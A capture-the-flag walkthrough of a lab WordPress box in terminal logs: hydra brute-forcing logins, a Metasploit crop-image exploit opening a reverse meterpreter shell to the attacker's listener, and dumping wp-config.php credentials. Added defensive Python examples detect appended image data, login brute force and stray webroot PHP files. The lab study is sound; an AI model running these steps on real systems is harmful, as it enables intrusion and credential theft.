smb: \> quit

Files can be uploaded, which means a reverse shell or a meterpreter shell could be uploaded. But where on the host does the upload land, and how would the reverse shell be executed? smbclient cannot run executables; ssh can.

On Kali Linux you can use the steghide tool to check whether an image contains steganographic or hidden information. steghide is a command-line tool for hiding and extracting steganographic data. To check an image for hidden information, follow these steps:

  1. Install steghide (if not already installed): open a terminal and enter the following commands:

sudo apt update
sudo apt install steghide

  2. Check the image with steghide: assuming you have an image file named image.jpg and want to check whether it hides information, run:

steghide info image.jpg

This command reports whether the image contains hidden information and, if so, shows some basic details about it, such as the size of the hidden data and the encryption cipher (if encryption was applied).

Note that steghide can only detect information hidden with the steghide tool itself; it cannot detect other steganographic techniques. If you suspect an image hides data by some other method, consider dedicated steganalysis tools such as stegdetect or stegosuite for a more thorough analysis.

According to the steghide info output, this is a JPEG image named "Alice-White-Rabbit.jpg" with a capacity of 1.8 KB. steghide then asks whether you want to try to retrieve information about the data embedded in the image.

Here steghide asks for a passphrase, because embedded data is usually encrypted with a passphrase at embedding time; only the correct passphrase can extract it. If you know the passphrase, enter it and press Enter, and steghide will try to extract and display the information embedded in the image.

If you do not know the passphrase, or are not authorized to perform the extraction, you can choose not to continue, and nothing will be extracted.

┌──(root㉿kali)-[~/Downloads]
└─# steghide info Alice-White-Rabbit.jpg 
"Alice-White-Rabbit.jpg":
  format: jpeg
  capacity: 1.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "rabbit_hole.txt":
    size: 48.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

To view the contents of rabbit_hole.txt, you need to extract the hidden file with the steghide extract command and supply the correct passphrase during extraction. After extraction you can view the file in a text editor or from the command line.

The steps to extract rabbit_hole.txt are:

  1. Extract the hidden file: enter the following command in the terminal and supply the correct passphrase when prompted:

steghide extract -sf Alice-White-Rabbit.jpg

  2. Enter the passphrase: enter the passphrase that was used to encrypt the hidden data.

  3. View the extracted file: after a successful extraction, steghide saves rabbit_hole.txt in the current working directory. You can open it with a text editor (such as nano or vim) or print it in the terminal with cat:

cat rabbit_hole.txt

Note that without the correct passphrase the hidden file cannot be extracted or viewed.

In this case no passphrase was needed to extract the hidden file.

┌──(root㉿kali)-[~/Downloads]
└─# steghide extract -sf Alice-White-Rabbit.jpg 
Enter passphrase: 
wrote extracted data to "rabbit_hole.txt".

┌──(root㉿kali)-[~/Downloads]
└─# cat rabbit_hole.txt 
You've found yourself in a rabbit hole, friend.

So the Samba share is a rabbit hole.
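The steghide check above only finds data that steghide itself embedded (inside the JPEG's DCT coefficients). A complementary structural check that a reviewer can run without any passphrase is to walk the JPEG marker segments and see whether anything sits after the end-of-image marker, which is the other common place a payload is tucked into an image. This is an added example, not part of the original write-up or of steghide; the sample image bytes are hand-constructed, and the check will not reveal a steghide embed, only appended data and the list of metadata segments (APPn/COM) worth a closer look.

```python
# Added example (not part of the original write-up): a structural JPEG walk
# that complements "steghide info". steghide hides its payload inside the
# image's DCT coefficients, so this walk will NOT reveal a steghide embed; it
# does catch the other common trick of appending a payload after the EOI
# marker, and it lists the metadata segments (APPn/COM) that deserve a look.
# The sample image bytes are constructed by hand, not taken from the box.
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}           # TEM, RST0..RST7: no length field
NAMES = {0xC0: "SOF0", 0xC2: "SOF2", 0xC4: "DHT", 0xDB: "DQT",
         0xDA: "SOS", 0xDD: "DRI", 0xFE: "COM"}

def marker_name(marker: int) -> str:
    if 0xE0 <= marker <= 0xEF:
        return f"APP{marker - 0xE0}"
    return NAMES.get(marker, f"M{marker:02X}")

def walk_jpeg(data: bytes):
    """Return (segments, trailing): segments is a list of
    (name, offset, total_length); trailing is every byte after EOI."""
    if data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI")
    segments = [("SOI", 0, 2)]
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}, got 0x{data[pos]:02X}")
        marker = data[pos + 1]
        if marker == EOI:
            segments.append(("EOI", pos, 2))
            return segments, data[pos + 2:]
        if marker in STANDALONE:
            segments.append((marker_name(marker), pos, 2))
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])   # length includes itself
        segments.append((marker_name(marker), pos, length + 2))
        pos += 2 + length
        if marker == SOS:
            # Entropy-coded scan data follows. Skip to the next real marker:
            # 0xFF00 is a stuffed data byte and RST0..RST7 live inside the scan.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
            else:
                raise ValueError("scan data runs past end of file")
    raise ValueError("EOI marker not found (truncated file?)")

def report(data: bytes) -> dict:
    """Summary a reviewer can act on: which metadata segments exist and
    whether anything is hiding past the end-of-image marker."""
    segments, trailing = walk_jpeg(data)
    names = [s[0] for s in segments]
    return {
        "segments": names,
        "metadata_segments": [n for n in names if n.startswith("APP") or n == "COM"],
        "trailing_bytes": len(trailing),
        "suspicious": len(trailing) > 0,
    }

def build_sample(trailer: bytes = b"") -> bytes:
    """Minimal hand-built JPEG: SOI, APP0/JFIF, SOS with a tiny scan that
    exercises byte stuffing and a restart marker, EOI, optional trailer."""
    app0 = b"\xFF\xE0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xFF\xDA" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3F\x00"
    scan = b"\x12\x34\xFF\x00\x56\xFF\xD0\x78"
    return b"\xFF\xD8" + app0 + sos + scan + b"\xFF\xD9" + trailer

if __name__ == "__main__":
    print(report(build_sample()))
    print(report(build_sample(b"payload appended after EOI")))
```

Run it against a real file with `report(open("Alice-White-Rabbit.jpg", "rb").read())`; a non-empty `trailing_bytes` is worth carving out and inspecting, and an unexpected COM or APPn segment is the next place to look with a hex viewer.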

Kali Linux : 10.18.72.222

Target IP Address : 10.10.143.236

The wordlist chosen for the earlier brute force was the wrong one; rockyou.txt should be used.

Login request packet

POST /wp-login.php HTTP/1.1
Host: blog.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://blog.thm
Connection: close
Referer: http://blog.thm/wp-login.php
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

log=kwheel&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1

The login failed, with this ERROR message:

HTTP/1.1 200 OK
Date: Wed, 02 Aug 2023 10:37:56 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 4072
Connection: close
Content-Type: text/html; charset=UTF-8

<div id="login_error">	<strong>ERROR</strong>: The password you entered for the username <strong>kwheel</strong> is incorrect. <a href="http://blog.thm/wp-login.php?action=lostpassword">Lost your password?</a><br />
</div>

This hydra command brute-forces the password of the target WordPress site (IP address 10.10.143.236). It tries to log in with the username "kwheel" and the different passwords in the rockyou.txt wordlist.

The command parameters are:

  • -l kwheel: specifies the username "kwheel", the account you are trying to log in as.
  • -P /usr/share/wordlists/rockyou.txt: specifies the path of the password wordlist; rockyou.txt is used to try different password candidates.
  • 10.10.143.236: the IP address of the target WordPress site.
  • http-post-form: tells hydra to submit the form with an HTTP POST request.
  • "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1": the login form's fields and parameters, where ^USER^ and ^PASS^ are placeholders; hydra substitutes each username from the username list for ^USER^ and each password from the password list for ^PASS^.
  • F=The password you entered for the username: the error message the site returns when the password is wrong, which hydra uses to recognise a failed attempt.

According to hydra's output, it is trying the username "kwheel" with the different passwords in rockyou.txt. When hydra sees the error message "The password you entered for the username", it means the password just tried was incorrect.

hydra keeps trying passwords from the wordlist until it finds the correct one or exhausts the whole list.

Note that password brute forcing is an inefficient and not recommended penetration-testing method. In a real environment it is easily detected and may trigger account lockouts or other security measures. In an authorized penetration test, more effective and less noisy methods such as social engineering or vulnerability exploitation should be preferred. When using password brute forcing or any other penetration-testing tool, make sure you have authorization and only test within the authorized scope.
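The request/response pair captured above also shows what the defender sees on the other side: every failed wp-login.php POST comes back as a 200 with the error form, while a successful login is answered by WordPress with a 302 to the redirect_to target. That makes a brute-force run easy to spot in the Apache access log. The following is an added example (not from the write-up) of a sliding-window detector over Apache combined-format log lines; the log lines are constructed for the example, and the 10-per-minute threshold is an assumption to tune per site.

```python
# Added example (not from the write-up): spotting a wp-login.php password
# spray in Apache combined-format access logs. The write-up's own capture
# shows why the status code is a useful signal: a failed WordPress login
# returns 200 with the error page, while a successful one answers 302 to
# wp-admin. The log lines below are constructed for the example.
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    d["status"] = int(d["status"])
    return d

def detect_login_bruteforce(lines, window_seconds=60, threshold=10):
    """Sliding window per source IP over POST /wp-login.php.
    Returns a list of alerts as (ip, kind, failures_in_window, time)."""
    alerts = []
    recent = defaultdict(deque)   # ip -> timestamps of recent failed logins
    flagged = set()               # IPs already alerted on, to avoid repeats
    for line in lines:
        e = parse_line(line)
        if not e or e["method"] != "POST" or not e["path"].startswith("/wp-login.php"):
            continue
        ip, ts = e["ip"], e["ts"]
        q = recent[ip]
        if e["status"] == 200:    # WordPress re-renders the form on failure
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                alerts.append((ip, "bruteforce", len(q), ts))
                flagged.add(ip)
        elif e["status"] == 302 and ip in flagged:
            # a redirect after a burst of failures is the guess that worked
            alerts.append((ip, "success_after_bruteforce", len(q), ts))
    return alerts

def _line(ip, second, status, size):
    """Build one constructed Apache combined-format line."""
    return (f'{ip} - - [02/Aug/2023:06:46:{second:02d} +0000] "POST /wp-login.php HTTP/1.1" '
            f'{status} {size} "http://blog.thm/wp-login.php" "Mozilla/5.0"')

# Constructed sample: one source hammering the form, one ordinary user who
# mistypes once and then logs in.
SAMPLE_LOG = [_line("10.18.72.222", s, 200, 4072) for s in range(0, 12)] + [
    _line("10.18.72.222", 12, 302, 0),
    _line("192.168.196.1", 30, 200, 4072),
    _line("192.168.196.1", 45, 302, 0),
]

if __name__ == "__main__":
    for alert in detect_login_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second alert kind is the one worth paging on: a 302 from an address that has just produced a burst of 200s means a credential was guessed, which is exactly the moment in the hydra output above. On a real server the same logic runs over `/var/log/apache2/access.log`; fronting wp-login.php with rate limiting or a lockout plugin turns the 200s into 429s or 403s and stops the run long before rockyou.txt gets anywhere.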

┌──(root㉿kali)-[~/Downloads]
└─# hydra -l kwheel -P /usr/share/wordlists/rockyou.txt 10.10.143.236 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"   
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-02 06:46:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.143.236:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username
[STATUS] 687.00 tries/min, 687 tries in 00:01h, 14343712 to do in 347:59h, 16 active
[STATUS] 678.67 tries/min, 2036 tries in 00:03h, 14342363 to do in 352:14h, 16 active
[80][http-post-form] host: 10.10.143.236   login: kwheel   password: cutiepie1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-02 06:51:30

┌──(root㉿kali)-[~/Downloads]
└─# hydra -l bjoel -P /usr/share/wordlists/rockyou.txt 10.10.143.236 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:The password you entered for the username"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-02 07:25:29
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.143.236:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:The password you entered for the username
[STATUS] 654.00 tries/min, 654 tries in 00:01h, 14343745 to do in 365:33h, 16 active
[STATUS] 663.67 tries/min, 1991 tries in 00:03h, 14342408 to do in 360:11h, 16 active
[STATUS] 658.14 tries/min, 4607 tries in 00:07h, 14339792 to do in 363:09h, 16 active
[80][http-post-form] host: 10.10.143.236   login: bjoel
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-02 07:32:45

Only one valid username and password was found:

login: kwheel password: cutiepie1

So the earlier run that "cracked" 16 passwords for one account was really because the failure message had not been set correctly. :)

hydra -l bjoel -P /usr/share/wordlists/rockyou.txt 10.10.143.236 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:The password you entered for the username"

Log in to the WordPress backend with the above username and password: http://blog.thm/wp-admin/

WordPress 5.0 running Twenty Twenty theme.

Version 5.0

A draft post named jiXvfuIpdw was found under Posts. Could it be a password?

jiXvfuIpdw

Email addresses were found in Comments:

Karen Wheeler

nconkl1190@gmail.com

192.168.196.1

Billy Joel

nconkl1@outlook.com

192.168.196.1

The following information was found in Profile:

Username : kwheel

First Name : Karen

Last Name : Wheeler

Nickname (required) : kwheel

Display name publicly as : Karen Wheeler

Email (required) : zlbiydwrtfjhmuuymk@ttirv.net

┌──(root㉿kali)-[~/Downloads]
└─# searchsploit WordPress 5.0
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi                                                                    | php/webapps/51042.txt
WordPress 5.0.0 - Image Remote Code Execution                                                                              | php/webapps/49512.py
WordPress Core 5.0 - Remote Code Execution                                                                                 | php/webapps/46511.js
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)                                                                | php/remote/46662.rb

WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)

┌──(root㉿kali)-[~/Downloads]
└─# msfconsole -q
[*] Starting persistent handler(s)...
msf6 > search WordPress 5.0

Matching Modules
================

   #  Name                                                     Disclosure Date  Rank       Check  Description
   -  ----                                                     ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_crop_rce                           2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   1  exploit/unix/webapp/wp_property_upload_exec              2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   2  auxiliary/scanner/http/wp_woocommerce_payments_add_user  2023-03-22       normal     Yes    Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation
   3  auxiliary/scanner/http/wp_registrationmagic_sqli         2022-01-23       normal     Yes    Wordpress RegistrationMagic task_ids Authenticated SQLi


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/http/wp_registrationmagic_sqli

msf6 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > show options

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THEME_DIR                   no        The WordPress theme dir name (disable theme auto-detection if provided)
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.117.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD cutiepie1
PASSWORD => cutiepie1
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 10.10.143.236
RHOSTS => 10.10.143.236
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 10.18.72.222:4444 
[*] Authenticating with WordPress using kwheel:cutiepie1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39927 bytes) to 10.10.143.236
[*] Meterpreter session 1 opened (10.18.72.222:4444 -> 10.10.143.236:50900) at 2023-08-02 08:02:31 -0400
[*] Attempting to clean up files...

meterpreter > 

meterpreter > sysinfo
Computer    : blog
OS          : Linux blog 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
bjoel:x:1000:1000:Billy Joel:/home/bjoel:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
smb:x:1001:1001::/srv/smb/files:/usr/sbin/nologin

meterpreter > shell
Process 2177 created.
Channel 2 created.
/bin/bash -i
bash: cannot set terminal process group (918): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blog:/var/www/wordpress$ cd /home/
cd /home/
www-data@blog:/home$ ls
ls
bjoel
www-data@blog:/home$ cd bjoel   
cd bjoel
www-data@blog:/home/bjoel$ ls
ls
Billy_Joel_Termination_May20-2020.pdf
user.txt
www-data@blog:/home/bjoel$ cat user.txt
cat user.txt
You won't find what you're looking for here.

TRY HARDER

www-data@blog:/home/bjoel$ uname -a
uname -a
Linux blog 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
www-data@blog:/home/bjoel$ netstat -antup
netstat -antup
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp        0    624 10.10.143.236:50900     10.18.72.222:4444       ESTABLISHED 2177/sh             
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::445                  :::*                    LISTEN      -                   
tcp6       0      0 :::139                  :::*                    LISTEN      -                   
tcp6       1      0 10.10.143.236:80        10.18.72.222:38817      CLOSE_WAIT  -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 10.10.143.236:68        0.0.0.0:*                           -                   
udp        0      0 10.10.255.255:137       0.0.0.0:*                           -                   
udp        0      0 10.10.143.236:137       0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -                   
udp        0      0 10.10.255.255:138       0.0.0.0:*                           -                   
udp        0      0 10.10.143.236:138       0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -           

Kernel privilege escalation is unlikely here, so it is skipped.

www-data@blog:/tmp$ cd /var/www/wordpress
cd /var/www/wordpress
www-data@blog:/var/www/wordpress$ ls
ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
zsKKjKSASz.php
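The listing above contains one entry that does not belong to a stock WordPress install, zsKKjKSASz.php, left behind by the upload chain. A defender reviewing a document root can find such files mechanically by diffing the listing against the set of files WordPress core ships at the top level. The following is an added example, not from the write-up and not a WordPress tool; the allowlist is the stock WordPress root (wp-config.php and .htaccess are site-specific and allowed), the listing is the one printed above, and the random-name heuristic and the uploads paths are constructed for the example.

```python
# Added example (not from the write-up): triage a WordPress document root
# listing for files that do not belong to a stock install. The crop-image
# upload chain in the write-up left zsKKjKSASz.php next to index.php, which
# is exactly the kind of entry this check flags. The listing below is the
# one printed in the write-up; the allowlist is the stock WordPress root.
import re

# Files and directories shipped in a WordPress core tarball at the top level
# (wp-config.php and .htaccess are site-specific, so they are allowed too).
WP_ROOT_ALLOWLIST = {
    "index.php", "license.txt", "readme.html", "wp-activate.php", "wp-admin",
    "wp-blog-header.php", "wp-comments-post.php", "wp-config-sample.php",
    "wp-config.php", "wp-content", "wp-cron.php", "wp-includes",
    "wp-links-opml.php", "wp-load.php", "wp-login.php", "wp-mail.php",
    "wp-settings.php", "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
    ".htaccess",
}
RANDOM_NAME = re.compile(r"^[A-Za-z0-9]{8,}\.php$")   # e.g. zsKKjKSASz.php

def looks_random(name: str) -> bool:
    """Crude heuristic: long alphanumeric basename with mixed case and no
    separators, the shape dropper scripts usually produce."""
    if not RANDOM_NAME.match(name):
        return False
    stem = name[:-4]
    return any(c.islower() for c in stem) and any(c.isupper() for c in stem)

def audit_webroot(listing, allowlist=WP_ROOT_ALLOWLIST):
    """Return a list of (name, reason) for entries that merit a look."""
    findings = []
    for name in listing:
        if name in allowlist:
            continue
        if name.endswith(".php"):
            reason = "unexpected PHP file in document root"
            if looks_random(name):
                reason += " (random-looking name)"
            findings.append((name, reason))
        else:
            findings.append((name, "not part of stock WordPress root"))
    return findings

def audit_uploads(paths):
    """wp-content/uploads should only hold media; a PHP-like file there is
    executable by the web server unless the server config blocks it."""
    bad_ext = (".php", ".phtml", ".php5", ".phar")
    return [p for p in paths
            if p.startswith("wp-content/uploads/") and p.lower().endswith(bad_ext)]

# The document root listing from the write-up.
SAMPLE_LISTING = [
    "index.php", "license.txt", "readme.html", "wp-activate.php", "wp-admin",
    "wp-blog-header.php", "wp-comments-post.php", "wp-config-sample.php",
    "wp-config.php", "wp-content", "wp-cron.php", "wp-includes",
    "wp-links-opml.php", "wp-load.php", "wp-login.php", "wp-mail.php",
    "wp-settings.php", "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
    "zsKKjKSASz.php",
]
# Constructed uploads paths for the second check.
SAMPLE_UPLOADS = [
    "wp-content/uploads/2023/08/photo.jpg",
    "wp-content/uploads/2023/08/shell.php",
]

if __name__ == "__main__":
    for finding in audit_webroot(SAMPLE_LISTING):
        print(finding)
    print(audit_uploads(SAMPLE_UPLOADS))
```

The allowlist diff is a triage step, not integrity verification: a modified core file keeps its name. For that, compare file hashes against the checksums WordPress publishes for the installed version (`wp core verify-checksums` in WP-CLI does this), and treat any PHP under wp-content/uploads as hostile until proven otherwise.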
www-data@blog:/var/www/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

/* Custom */
/*
define('WP_HOME', '/');
define('WP_SITEURL', '/'); */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'LittleYellowLamp90!@');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/** Custom FS Method */
define('FS_METHOD', 'direct');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'ZCgJQaT0(*+Zjo}Iualapeo|?~nMtp^1IUrquYx3!#T$ihW8F~_`L+$N E>J!Bm;');
define('SECURE_AUTH_KEY',  'nz|(+d|| yVX-5_on76q%:M, ?{NVJ,Q(;p3t|_B*]-yQ&|]3}M@Po!f_,T-S4fe');
define('LOGGED_IN_KEY',    'a&I&DR;PUnPKul^kLBgxYa@`g||{eZf><sf8SmKBi+R7`O?](SuL&/H#hqzO$_:3');
define('NONCE_KEY',        'Vdd-zzB:/yxg6unZvng,oY-%Z V,i%+Uz_f)S;Efz!;cY3p~]T,g1z*Z[jXe>5Sm');
define('AUTH_SALT',        'u+k8g;=jbe)6/X~<M1HwINhH(Tno@orx:$_$-#*id)ddBYGGF(]AP?}4?2E|m;5`');
define('SECURE_AUTH_SALT', '>Rg5>,/^BywVg^A[Etqot:CoU+9<)YPM~h|)Ifd5!iK!L*5+JDiZi33KrYZNd2B7');
define('LOGGED_IN_SALT',   '3kpL-rcnU+>H#t/g>9<)j/u I1/-Ws;h6GrDQ>v8%7@C~`h1lBC/euttp)/8EdA_');
define('NONCE_SALT',       'JEajZ)y?&.m-1^$(c-JX$zi0qv|7]F%7a6jh]P5SRs+%`*60?WJVk$><b$poQg9>');


/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
